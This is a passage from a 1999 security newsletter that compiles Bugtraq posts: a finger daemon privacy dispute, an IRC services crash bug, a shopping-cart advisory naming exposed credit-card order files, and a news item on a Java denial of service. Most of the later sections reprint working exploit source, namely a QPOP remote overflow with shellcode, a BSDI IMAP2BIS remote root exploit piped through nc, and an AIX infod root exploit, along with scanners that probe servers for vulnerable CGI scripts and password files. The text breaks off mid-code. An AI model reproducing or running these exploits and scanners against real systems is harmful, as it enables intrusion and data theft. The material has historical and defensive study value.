Eilon Gishri To: BUGTRAQ@netspace.org Subject: Re: Ffingerd privacy issues On Fri, Apr 23, 1999 at 07:43:33PM +0200, Felix von Leitner wrote: > Thus spake Eilon Gishri (eilon@aristo.tau.ac.il): > > I found a couple of bugs in ffingerd 1.19 which are related to > > privacy. > > OK. I would be happy if you email me (the author) first before > publishing this on bugtraq. Next time, maybe. I've e-mailed you and Cc-ed BugTraq. As my email includes a fix (A very complicated one I must say :)) I also notified the list. I'm not sure I would have done the same if I couldn't fix it myself. > [ffingerd assumes the user wants to be fingered if his home does not > give public execute access] Huh, It's opened if it's closed ? > This is documented in ffingerd. If you want ffingerd to look into > protected homes, run it as root. I want the machine itself to be protected and not only the users home directory. I consider it a feature when I don't have to run fingerd as root. Please don't consider it as a flame, I do like this utility and am using it. > > ----- > > (aristo)/cc/eilon>finger root@host.domain > > [host.domain] > > That user does not want to be fingered > > ----- > > > Hmmm, now for an unknown user. > > > ----- > > (aristo)/cc/eilon>finger root1@host.domain > > [host.domain] > > That user does not want to be fingered. > > ----- > > > Oops. Notice the dot ('.') at the end of the sentence. A very simple > > and efficient way to find whether the user exists on the remote host > > or not (taking into account the fact that ffingerd has been installed > > on the remote host). > > This has been pointed out to me yesterday. I fixed it today (before I > saw this message, by the way), and announced version 1.20 on Freshmeat > pointing out this fixed problem. Did you see my announcement and then > posted to bugtraq? Nope. I was playing with it on a machine which I would like to see all fingers which are done to it without giving away any "free" information > This is debatable. > If a user wants privacy, he should remove the world readable permission, > not the world executable permission. I disagree. > I will not add this right now but think it over. If anyone wants to > comment on the way to go here, feel free to email me. I would prefer > discussion this in private email than on bugtraq, but if you must, I > will also read bugtraq comments. -- Eilon Gishri eilon@aristo.tau.ac.il Security Consultant Office: +972-3-6406723 Israel Inter University Computation Center Fax: +972-3-6409118 /* On a matter of national security */ Home: +972-3-5078671 ------------------------------------------------------------------------------ Date: Fri, 23 Apr 1999 15:46:59 -0500 From: Dagmar d'Surreal To: BUGTRAQ@netspace.org Subject: Re: Ffingerd privacy issues Parts/Attachments: 1 Shown 36 lines Text 2 OK 1.4 KB Application, "" ---------------------------------------- As to the matter of the home directories being world-readable/executeable... Having the finger daemon assume that there is no .nofinger file because the home directory in question is not readable, but still executeable, breaks a few things. On multi-user machines, some users will be extremely paranoid, and will not wish to use anything BUT mode 700, because having the directory world-executeable will allow other users on the system to detect the presence of certain files in their directory (like .rhosts, .forward, .promcail, .pinerc) that may allow them to launch attacks at that particular user, knowing that there's a good chance that the user uses a vulnerable package, and quite possibly even the last time they used it depending on the file. After seeing the post on freshmeat, it occurred to me that I had forgotten to email Felix the patch for 1.18 that took care of the punctuation as well as a few other issues, and I now notice that I sent him the wrong version of the patch this morning anyway. (A version which did not have the directory mode issue fixed, but at least my binary has been working all this time thankfully.) Eilon Gishri dealt with it a lot more elegantly than I did anyway. ;) Attached is a patch which applies to the 1.20 version of Fefe's Finger Daemon, which includes both Eilon Gishri's patches to deal with paranoid users whose home directories are mode 700 (the punctuation problem had already been fixed in 1.20), and my misdirection patches that add the .fakefinger (lets users controly exactly what will be returned when they are fingered) file use, and the /etc/ffingerd.empty and /etc/ffingerd.indirect files which allow a sysadmin to change what kind of message is sent to people when they try indirect or empty finger queries without having to edit the source and recompile the daemon. ---------- Unsolicited commercial email sent to this address will be forwarded to uce@ftc.gov, or responded to late in the evening after I've been clubbing long enough to be fairly drunk, and at least twice as verbally abusive. @HWA 22.0 DoS in IRC services ~~~~~~~~~~~~~~~~~~~ Date: Thu, 22 Apr 1999 22:53:42 EDT From: Andy Church To: BUGTRAQ@netspace.org Subject: Bug in Services for IRC Networks 4.2.2 A bug has been found in versions through 4.2.2 of Services for IRC Networks which allows any IRC user to crash the program. The channel service's SET SUCCESSOR command does not properly handle the case of no parameters, and generates a segmentation fault attempting to access address zero. This bug is believed to be present in all versions since the SET SUCCESSOR command was introduced (in version 4.1.0). A new version, 4.2.3, has been released which fixes this bug. Users of prior versions of Services should upgrade immediately. Services updates are always announced on the Services mailing list; see http://achurch.dragonfire.net/services/about.html for information on subscribing to the list. --Andy Church achurch@dragonfire.net http://achurch.dragonfire.net/ @HWA 23.0 The big e-commerce crunch. Several web shopping carts are still wide open; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 22 Apr 1999 13:09:32 -0400 From: Elaich Of Hhp To: BUGTRAQ@netspace.org Subject: WebShop advisory. (hhp) WebShop advisory. (hhp) --------------------------------------------------------------------- Alright to my knowledge, there is another dangerous shop service if installed the right way. I contacted the vendor and notified the admin of the problem. I have the feeling this isnt all though. I'm almost posotive there are more dangerous shopping services out there that will be found very soon after all these posts get noticed. So for now I will look around, please dont flood my email and i'll repost if I find anything else. Please remember this does not mean there is a flaw in the service unless it is by defualt this is left readable on a clean instalation with no configuration files to modify the permissions. Also PGP options would illiminate most of the problems. Also please note I did not install this software, the info I have gathered was on the website and the vulnerable site was found by a search engine. Info: WebShop via http://www.inetlab.com/products.html Platforms: Windows 95/98/NT on Intel Linux on Intel or Sparc Solaris on Intel or Sparc FreeBSD 2.2 or smaller on Intel FreeBSD 3.0 on Intel BSDI/OS on Intel............... (Found vuln server.) Silicon Graphics Irix on MIPS.. (Found vuln server.) Executable: WebShop.cgi Exposed Directory: WebShop or webshop Exposed Order info: WebShop/templates/cc.txt and or WebShop/logs/cc.txt and ck.log Status: Free?, resale=$50?. Number of exposed installs found: 2+ PGP Option available?: Unknown. elaich - 4:16:15CST 4/22/1999 -------------------------------------------- elaich of the hhp. Email: hhp@hhp.hemp.net / pigspigs@yahoo.com Voice: 1800-Rag-on-gH pin: The-hhp-crew Web: http://hhp.hemp.net -------------------------------------------- @HWA 24.0 New Java bug unveils new Win9x DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Astral http://www.403-security.com/ http://www.news.com/News/Item/0,4,35760,00.html Java bug crashes Windows 95, 98 By Stephen Shankland Staff Writer, CNET News.com April 27, 1999, 5:30 p.m. PT URL: http://www.news.com/News/Item/0,4,35760,00.html A college student has found a glitch that enables a malicious Java program to crash Windows 95- or 98-based computers. The bug uses Java to take advantage of a long-standing problem with Microsoft's Windows 95 and Windows 98 operating systems, according to Joseph Ashwood, a computer research undergraduate student at the University of Southern California. Specifically, it creates more and more computing processes, called "threads," until the system runs out of resources. "It generates so many threads that the system loses all control over itself," Ashwood said. Such a malicious Java program could be embedded on a Web page, according to Ashwood, who said he came across the bug when he was looking at the Java source code for a computer security class. Sun and Microsoft acknowledged the problem, but said that "denial of service" attacks such as Ashwood's thread-overrun program are common and that protecting against them is difficult. The Java thread-overrun program is interesting in light of the fact that the malicious program crashes Windows 95 and 98 computers without ever leaving the Java "sandbox" that's designed to curtail Java programs so they can't wreak havoc on an operating system. More robust operating systems such as Windows NT or Sun's Solaris aren't troubled by the bug. A Microsoft spokesperson said the company is considering addressing the threading weakness, but that the problem is deeply buried in the operating system architecture and that modifying the relevant code would require "a major overhaul." Indeed, one of the reasons for developing Windows NT was because of the need for a more robust threading architecture, the spokesperson said. Microsoft also encouraged users to be careful which Web sites they visit and what software they download. The malicious program has crashed Windows 95 and Windows 98 systems with both Microsoft's Internet Explorer and Netscape Navigator Web browsers, Ashwood said. In some circumstances, Navigator crashes but the system doesn't, he said. Ashwood discovered the bug looking at a previous versions of Java, but he's found that it operates with the most recent version as well. In his tests, Ashwood has found that Windows NT performance degrades and the browser stops responding. On Unix systems, the browser hangs up, he said. From a programming point of view, it's difficult to fix a problem like this one, which takes advantage of the overuse of an ordinary activity such as generating a new thread, said Roland Jones, senior product manager for Java security. "What's doing this is a normal operation taken to excess. It's really hard to tell what's normal and what's excessive," Jones said. Creating threads is as basic to computers as eating is to people, but in this case, "The waitress can't tell that this guy has ordered 47 steaks already." Ashwood contended "it should be rather simple for either Microsoft or Sun to fix it" by counting and limiting the threads. He added that it would be most logical for Microsoft to fix it, because the thread issue is a vulnerability that's not limited just to Java. The Java-based thread-overrun program runs inside the Java virtual machine, the software component that lets programs written in Java execute on all sorts of different chips. The thread overrun issue "could be addressed in the virtual machine. We have some thoughts about what we can do. But we haven't had that much trouble with it," Jones said. "It's one of the things that's been on our list to look at." "The better operating system should be able to handle this," he added . Ashwood said he notified Sun about the exploit in September, October, and November, and was dissatisfied with the company's responses. Last week, he described the bug on the Alienware Web site. @HWA 25.0 QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.and BSDi 2.1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5. * and BSDi 2.1 * 24-Jun-1998 by stran9er * * Based: * FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author. * x86 decode.bin/encode.c by Solar Designer. * * Disclaimer: * this demonstration code is for educational purposes only! DO NOT USE! */ #include #include #include #define ESP 0xefbfd480 #define BMW 750 main(int argc, char **argv) { int i,t,offset = 500; char buf[1012]; char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD"; char decode_x86[] = "\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30" "\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83" "\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67" "\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/ char shellcode_BSDi[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n"); if (argc>1) offset = atoi(argv[1]); fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP); offset+=ESP; fprintf (stderr," esp+offset=0x%x\n\n",offset); for(i=0;i> 24; buf[1007] = (offset & 0x00ff0000) >> 16; buf[1006] = (offset & 0x0000ff00) >> 8; buf[1005] = (offset & 0x000000ff); printf("%s\n",buf); } /* -- CONFIDENTIAL -- */ @HWA 26.0 BSDI IMAP2BIS remote root exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* BSDI IMAP2BIS remote root exploit Usage: (./imapx ;cat)| nc targethost 143 where offset = -1000..1000 (brute force if 0 doesnt work) Note: if you plan to port this to other OS., make sure the shellcode doesn't contain lower case chars since imapd will toupper() the shellcode, thus fucking it up. Note: I tested this on a few system's and found this offsets vulnerable */ #include #include #include #include #define BUFLEN 4092 #define NOP 0x90 char shell[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "\x42\x49\x4e\x2f\x53\x48\x00"; void main (int argc, char *argv[]) { char buf[BUFLEN]; int offset,nop,i; unsigned long esp; char shell[1024+300]; fprintf(stderr,"usage: %s \n", argv[0]); nop = 403; esp = 0xefbfd5e8; offset = atoi(argv[1]); memset(buf, NOP, BUFLEN); memcpy(buf+(long)nop, shell, strlen(shell)); for (i = 1024; i < BUFLEN - 3; i += 2) { *((int *) &buf[i]) = esp + (long) offset; shell[ sizeof(shell)-1 ] = 0; } printf("{%d} AUTH\r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; } @HWA 27.0 Infod AIX exploit ~~~~~~~~~~~~~~~~~ /* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.co Run program with the login you want to exploit :) When the window appears, select "options", "defaults", change printer to something more useful (like /bin/x11/xterm) and print ! Comments,questions : arisme@altern.org */ #include #include #include #include #include #include #include #define TAILLE_BUFFER 2000 #define SOCK_PATH "/tmp/.info-help" #define PWD "/tmp" #define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)" #define NOUSER "Use : infofun [login]" #define UNKNOWN "User does not exist !" #define OK "Waiting for magic window ... if you have problems check the xhost " void send_environ(char *var,FILE *param) { char tempo[TAILLE_BUFFER]; int taille; taille=strlen(var); sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0); fwrite(tempo,1,taille+4,param); } main(int argc,char** argv) { struct sockaddr_un sin,expediteur; struct hostent *hp; struct passwd *info; int chaussette,taille_expediteur,port,taille_struct,taille_param; char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur; FILE *param; char *HOME,*LOGIN; int UID,GID; printf("\n\n%s\n\n",KOPY); if (argc!=2) { printf("%s\n",NOUSER); exit(1); } info=getpwnam(argv[1]); if (!info) { printf("%s\n",UNKNOWN); exit(1); } HOME=info->pw_dir; LOGIN=info->pw_name; UID=info->pw_uid; GID=info->pw_gid; param=fopen("/tmp/tempo.fun","wb"); chaussette=socket(AF_UNIX,SOCK_STREAM,0); sin.sun_family=AF_UNIX; strcpy(sin.sun_path,SOCK_PATH); taille_struct=sizeof(struct sockaddr_un); if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0) { perror("connect"); exit(1); } /* 0 0 PF_UID pf_UID 0 0 */ sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0); fwrite(buffer,1,6,param); /* PF_GID pf_GID */ sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256)); fwrite(buffer,1,2,param); /* DISPLAY (259) */ bzero(buffer,TAILLE_BUFFER); strcpy(buffer,getenv("DISPLAY")); fwrite(buffer,1,259,param); /* LANG (1 C 0 0 0 0 0 0 0) */ sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0); fwrite(buffer,1,9,param); /* size_$HOME $HOME 0 0 0 */ send_environ(HOME,param); /* size_$LOGNAME $LOGNAME 0 0 0 */ send_environ(LOGIN,param); /* size_$USERNAME $USERNAME 0 0 0 */ send_environ(LOGIN,param); /* size_$PWD $PWD 0 0 0 */ send_environ(PWD,param); /* size_DISPLAY DISPLAY 0 0 0 */ //send_environ(ptsname(0),param); /* If we send our pts, info_gr will crash as it has already changed UID */ send_environ("/dev/null",param); /* It's probably not useful to copy all these environment vars but it was good for debugging :) */ sprintf(buffer,"%c%c%c%c",23,0,0,0); fwrite(buffer,1,4,param); sprintf(buffer,"_=./startinfo"); send_environ(buffer,param); sprintf(buffer,"TMPDIR=/tmp"); send_environ(buffer,param); sprintf(buffer,"LANG=%s",getenv("LANG")); send_environ(buffer,param); sprintf(buffer,"LOGIN=%s",LOGIN); send_environ(buffer,param); sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH")); send_environ(buffer,param); sprintf(buffer,"PATH=%s",getenv("PATH")); send_environ(buffer,param); sprintf(buffer,"%s","EDITOR=emacs"); send_environ(buffer,param); sprintf(buffer,"LOGNAME=%s",LOGIN); send_environ(buffer,param); sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN); send_environ(buffer,param); sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME")); send_environ(buffer,param); sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH")); send_environ(buffer,param); sprintf(buffer,"%s","PS1=(exploited !) "); send_environ(buffer,param); sprintf(buffer,"USER=%s",LOGIN); send_environ(buffer,param); sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE")); send_environ(buffer,param); sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY")); send_environ(buffer,param); sprintf(buffer,"SHELL=%s",getenv("SHELL")); send_environ(buffer,param); sprintf(buffer,"%s","ODMDIR=/etc/objrepos"); send_environ(buffer,param); sprintf(buffer,"HOME=%s",HOME); send_environ(buffer,param); sprintf(buffer,"%s","TERM=vt220"); send_environ(buffer,param); sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]"); send_environ(buffer,param); sprintf(buffer,"PWD=%s",PWD); send_environ(buffer,param); sprintf(buffer,"%s","TZ=NFT-1"); send_environ(buffer,param); sprintf(buffer,"%s","A__z=! LOGNAME"); send_environ(buffer,param); /* Start info_gr with -q parameter or the process will be run locally and not from the daemon ... */ sprintf(buffer,"%c%c%c%c",1,45,113,0); fwrite(buffer,1,4,param); fclose(param); param=fopen("/tmp/tempo.fun","rb"); fseek(param,0,SEEK_END); taille_param=ftell(param); fseek(param,0,SEEK_SET); fread(paramz,1,taille_param,param); fclose(param); unlink("/tmp/tempo.fun"); /* Thank you Mr daemon :) */ write(chaussette,paramz,taille_param); printf("\n%s %s\n",OK,getenv("HOSTNAME")); close(chaussette); } ------------------------------------------------------------------------- RSI.0011.11-12-98.AIX.INFOD |:::. |::::: |::::. |::::: |::::: |::::. .. :: .. .. :: .. .. .. :: |:::: |:::: |:::: :::::: |::::: |:::: |: |: :: |: |: |:: |: |: :: |: :: |::::: |: |::::: |::::: |::::: Repent Security Incorporated, RSI [ http://www.repsec.com ] *** RSI ALERT ADVISORY *** --- [CREDIT] -------------------------------------------------------------- Andrew Green: Discovered the vulnerability Mark Zielinski: Author of the advisory --- [SUMMARY] ------------------------------------------------------------- Announced: November 09, 1998 Report code: RSI.0011.11-12-98.AIX.INFOD Report title: AIX infod Vulnerability: Please see the details section Vendor status: AIX contacted on November 12, 1998 Patch status: IBM is currently working on several fixes Platforms: AIX 3.2.x, 4.1.x, 4.2.x, 4.3.x Reference: http://www.repsec.com/advisories.html Impact: If exploited, an attacker could potentially compromise root access locally on your server --- [DETAILS] ------------------------------------------------------------- Description: The Info Explorer daemon is a AIX utility which is used to provide documentation for the operating system and associated programs. Problem: The info daemon does not perform any validation on information passed to the local socket that it is bound to. Users on the system can send false information to the daemon and trick it into spawning a connection to the intruders X display. Details: By sending a UID and GID of 0, along with a false environment, infod will be forced into spawning a connection with root privileges to the intruder's X display. Once the program appears on the screen, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under. --- [FIX] ----------------------------------------------------------------- Solution: IBM is currently working on the following fixes which will be available soon: AIX 3.2.x: upgrade to version 4 AIX 4.1.x: IX84640 AIX 4.2.x: IX84641 AIX 4.3.x: IX84642 Until the fixes can be applied, the infod daemon should be disabled. Run the following commands as root: # stopsrc -s infod # rmitab infod # chown root.system /usr/lpp/info/bin/infod # chmod 0 /usr/lpp/info/bin/infod --------------------------------------------------------------------------- Repent Security Incorporated (RSI) 13610 N. Scottsdale Rd. Suite #10-326 Scottsdale, AZ 85254 E-Mail: advise@repsec.com FTP: ftp://ftp.repsec.com WWW: http://www.repsec.com --------------------------------------------------------------------------- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzU6dqAAAAEEAOHt9a5vevjD8ZjsEmncEbFp2U7aeqvPTcF/8FJMilgOVp75 dshXvZixHsYU7flgCNzA7wLIQPWBQBrweLG6dx9gE9e5Ca6yAJxZg8wNsi06tZfP nvmvf6F/7xoWS5Ei4k3YKuzscxlyePNNKws6uUe2ZmwVoB+i3HHT44dOafMhAAUT tBpSZXBTZWMgPGFkdmlzZUByZXBzZWMuY29tPg== =ro8H -----END PGP PUBLIC KEY BLOCK----- Copyright November 1998 RepSec, Inc. The information in this document is provided as a service to customers of RepSec, Inc. Neither RepSec, Inc., nor any of it's employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or services by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by RepSec, Inc. The views and opinions of authors express herein do no necessarily state or reflect those of RepSec, Inc., and may not be used for advertising or product endorsement purposes. The material in this alert advisory may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to RepSec, Inc. This alert advisory may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community. --------------------------------------------------------------------------- RepSec, Inc. are trademarks of RepSec, Inc. All other trademarks are property of their respective holders. @HWA 28.0 Cold Fusion vulnerability scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory "Cold Fusion Application Server Advisory" dated 4.20.1999 you can find a copy of this advisory and all other l0pht Security Advisories here: http://www.l0pht.com/advisories.html much of this program was blatently copied from the cgi scanner released about a week ago, written by su1d sh3ll... I just want to give credit where credit is due... this particular scanner was "written" (basically modified) by hypoclear of lUSt - Linux Users Strike Today... I know that it is trivial to check to see if a server is vulnerable, but I had fun doing this so who the heck cares if I want to waste my time... while I'm here I minds well give shout outs to: Phrozen Phreak (fidonet rules) Special K (you will never get rid of my start button ;-) go powerpuff girls (he he) ;-) compile: gcc -o coldscan coldscan.c usage: coldscan host tested on: IRIX Release 5.3 (this should compile on most *NIX systems though) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cfbuff[1024]; char *cfpage[5]; char *cfname[5]; cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n"; cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n"; cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n"; cfname[1] = "openfile.cfm "; cfname[2] = "displayopenedfile.cfm "; cfname[3] = "exprcalc.cfm "; if (argc<2) { printf("\n-=COLD FUSION VULNERABILITY TESTER=-"); printf("\nusage - %s host \n",argv[0]); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n"); printf("scanning...\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } while(count++ < 3) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cfname[count]); for(numin=0;numin < 1024;numin++) { cfbuff[numin] = '\0'; } send(sock, cfpage[count],strlen(cfpage[count]),0); recv(sock, cfbuff, sizeof(cfbuff),0); cgistr = strstr(cfbuff,foundmsg); if( cgistr != NULL) printf("Exists!\n"); else printf("Not Found\n"); close(sock); } } @HWA 29.0 Updated CGI scanner scans for vulnerable servers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* Cgi Scan v3.0 - scans for vunerabil webbased servers */ /* Based on Ech0's cgi scanner - i thought it was crap :( */ /* Modified and re-written by v0rt-fu (### - undernet) */ /* Most of these can be exploited via www.anonymiser.com */ /* phf isnt allow - others havent been tested by should */ /* work. */ /* Considering this scans a server for 43 vunerabilities */ /* only those exploits found are shown so you can track */ /* what is actually happening */ /* Thanks to b|ueberry for helping me pull through the */ /* the hard times and made me continue to code :) */ /* v0rt-fu */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cgibuff[1024]; char *buff[50]; char *cginame[50]; buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; buff[2] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[14] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[15] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[16] = "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[17] = "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[18] = "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[19] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[20] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[21] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[22] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n"; buff[23] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[24] = "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[25] = "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[26] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[27] = "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[28] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[29] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[30] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[31] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[32] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[33] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[34] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[35] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[36] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[37] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n"; buff[38] = "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[39] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[40] = "GET /search97.vts HTTP/1.0\n\n"; buff[41] = "GET /carbo.dll HTTP/1.0\n\n"; buff[42] = "GET /cgi-bin/fpexplore.exe HTTP/1.0\n\n"; buff[43] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n"; cginame[1] = "UnlG "; cginame[2] = "phf "; cginame[3] = "Count.cgi "; cginame[4] = "test-cgi "; cginame[5] = "nph-test-cgi "; cginame[6] = "php.cgi "; cginame[7] = "handler "; cginame[8] = "webgais "; cginame[9] = "websendmail "; cginame[10] = "webdist.cgi "; cginame[11] = "faxsurvey "; cginame[12] = "htmlscript "; cginame[13] = "pfdisplay "; cginame[14] = "perl.exe "; cginame[15] = "wwwboard.pl "; cginame[16] = "www-sql "; cginame[17] = "view-source "; cginame[18] = "campas "; cginame[19] = "aglimpse "; cginame[20] = "man.sh "; cginame[21] = "AT-admin.cgi "; cginame[22] = "filemail.pl "; cginame[23] = "maillist.pl "; cginame[24] = "jj "; cginame[25] = "info2www "; cginame[26] = "files.pl "; cginame[27] = "finger "; cginame[28] = "bnbform.cgi "; cginame[29] = "survey.cgi "; cginame[30] = "AnyForm2 "; cginame[31] = "textcounter.pl "; cginame[32] = "classifields.cgi "; cginame[33] = "environ.cgi "; cginame[34] = "service.pwd "; cginame[35] = "users.pwd "; cginame[36] = "authors.pwd "; cginame[37] = "administrators.pwd "; cginame[38] = "args.bat "; cginame[39] = "uploader.exe "; cginame[40] = "search97.vts "; cginame[41] = "carbo.dll "; cginame[42] = "fpexplore.exe "; cginame[43] = "openfile.cfm "; if (argc<2) { printf("\n _ _ __ ___ _ _ _ _ __ ___ _ _ _ _ __ ___ _ _ "); printf("\n( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( )"); printf("\n ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( "); printf("\n(_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) 